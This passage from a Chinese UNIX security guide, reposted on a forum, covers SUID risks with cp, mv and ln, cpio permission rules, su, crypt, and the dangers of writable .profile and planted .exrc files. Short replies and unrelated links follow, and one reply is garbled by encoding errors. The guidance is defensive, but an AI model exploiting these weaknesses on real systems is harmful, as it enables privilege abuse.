和SGID许可.新拷贝的文件属拷贝的用户所有,故拷贝另人的文件时应小心,不要被其他用户的SUID程序破坏自己的文件安全. mv移文件时,新移的文件存取许可与原文件相同,mv仅改变文件名.只要用户有目录的写和搜索许可,就可移走该目录中某人的SUID程序且不改变其存取许可. 若目录许可设置不正确,则用户的SUID程序可被移到一个他不能修改和删除的目录中, 将出现安全漏洞.
ln为现有文件建立一个链,即建立一个引用同一文件的新名字. 如目的文件已经存在,则该文件被删除而代之以新的链,或存在的目的文件不允许用户写它,
则请求用户确认是否删除该文件,只允许在同一文件系统内建链.若要删除一个SUID文件,就要确认文件的链接数,只有一个链才能确保该文件被删除.若SUID文件已有多个链,一种方法是改变其存取许可方式, 将同时修改所有链的存取许可,也可以chmod 000 文件名,不仅取消了文件的SUID和SGID许可,而且也取消了文件的全部链.要想找到谁与自己的SUID程序建立了链,不要立刻删除该程序,系统管理员可用ncheck命令找到该程序的其它链. cpio命令用于将目录结构拷贝到一个普通文件中,而后可再用cpio命令将该普通文件转成目录结构.用-i选项时,cpio从标准输入设备读文件和目录名表,并将其内容按档案格式拷贝到标准输出设备,使用-o选项时, cpio从标准输入设备读取先已建好的档案,重建目录结构.cpio命令常用以下命令做一完整的目录系统档案:
find fromdir -print|cpio -o >archive
根据档案文件重建一个目录结构命令为:
cpio -id < archive
cpio的安全约定如下:
(1)档案文件存放每个文件的信息,包括文件所有者,小组用户, 最后修改时间最后存取时间,文件存取许可方式.
*根据档案建立的文件保持存放于档案中的存取许可方式.
*从档案中提取的每个文件的所有者和小组用户设置给运行 cpio -i命令的用户,而不是设置给档案中指出的所有者和小组用户.
*当运行cpio -i命令的用户是root时,被建立的文件的所有者和小组用户是档案文件所指出的.
*档案中的SUID/SGID文件被重建时,保持SUID和SGID许可, 如果重建文件的用户不是root,SUID/SGID许可是档案文件指出的用户/小组的许可.
(2)现存文件与cpio档案中的文件同名时,若现存文件比档案中的文件更新,这些文件将不被重写.
(3)如果用修改选项U,则同名的现存的文件将被重写. 可能会发生一件很奇怪的事:如被重写的文件原与另一个文件建了链,文件被重写后链并不断开,换言之,该文件的链将保持,因此,该文件的所有链实际指向从档案中提取出来的文件,运行cpio无条件地重写现存文件以及改变链的指向.
(4)cpio档案中可含的全路径名或父目录名给出的文件.
7.su和newgrp命令
(1)su命令:可不必注销户头而将另一用户又登录进入系统,作为另一用户工作它将启动一新的shell并将有效和实际的UID和GID设置给另一用户. 因此必须严格将root口令保密.
(2)newgrp命令:与su相似,用于修改当前所处的组名.
8.文件加密
crypt命令可提供给用户以加密文件, 使用一个关键词将标准输入的信息编码为不可读的杂乱字符串,送到标准输出设备.再次使用此命令,用同一关键词作
用于加密后的文件,可恢复文件内容. 一般来说,在文件加密后,应删除原始文件,只留下加密后的版本,且不能忘记加密关键词.在vi中一般都有加密功能用vi -x命令可编辑加密后的文件. 关于加密关键词的选取规则与口令的选取规则相同. 由于crypt程序可能被做成特洛依木马,故不宜用口令做为关键词.最好在加密前用pack或compress命令对文件进行压缩后再加密.
9.其它安全问题
(1)用户的.profile文件
由于用户的HOME目录下的.profile文件在用户登录时就被执行.若该文件对其他人是可写的 则系统的任何用户都能修改此文件,使其按自己的要求工作.这样可能使得其他用户具有该用户相同的权限.
(2)ls -a
此命令用于列出当前目录中的全部文件,包括文件名以.开头的文件,查看所有文件的存取许可方式和文件所有者,任何不属于自己但存在于自己的目录中的文件都应怀疑和追究.
(3).exrc文件
为编辑程序的初始化文件,使用编辑文件后,首先查找$HOME/.exrc文件和./.exrc文件,若该文件是在$HOME目录中找到, 则可像.profile一样控制它的存取方式,若在一个自己不能控制的目录中,运行编辑程序,则可能运行其他人的.exrc文件, 或许该.exrc文件存在那里正是为了损害他人的文件安全.为了保证所编辑文件的安全,最好不要在不属于自己或其他人可写的目录中运行任何编辑程序.
(4)暂存文件和目录
在UNIX系统中暂存目录为/tmp和/usr/tmp,对于程序员和许多系统命令都使用它们,如果用这些目录存放暂存文件,别的用户可能会破坏这些文件.使用暂存文件最好将文件屏蔽值定义为007, 但最保险的方法是建立自己的暂存文件和目录:$HOME/tmp,不要将重要文件存放于公共的暂存目录.
(5)UUCP和其它网络
UUCP命令用于将文件从一个UNIX系统传送到另一个UNIX系统,通过UUCP传送的文件通常存于/usr/spool/uucppublic/login目录,login是用户的登入目录.
要求加精华
bb8848 回复于:2003-07-09 18:03:27建h@N老B的人物,把生的精槿A做成一chm或其它型的文件,@佑斜沆恫锁B慢慢啃,(不知道^不^份)
ihweb 回复于:2003-07-09 18:04:26[quote:2441759968=“bb8848”]建h@N老B的人物,把生的精槿A做成一chm或其它型的文件,@佑斜沆恫锁B慢慢啃,(不知道^不^份)[/quote:2441759968]
我也觉得是!!可惜找不到原作者,要不我这个菜鸟第一时间找他签名!
口黑口黑
heyu 回复于:2003-07-24 22:23:27的确是老鸟!!
历害!!
佩服!!!!
原文转自:www.ltesting.net
- 教育行业笔记本电脑系统安全解决方案2025-05-25
- 落实安全等级保护增强信息系统安全2022-12-11
- 二的成语2023-02-21
- 复习二2024-05-09
- 二教案2023-03-27
- 自我鉴定 二2023-03-17
- 心得二2025-01-01
- PKI/CA技术推动电力信息系统安全建设2023-07-03
- 什么是系统征文2025-07-05
- 关于二的成语2024-02-18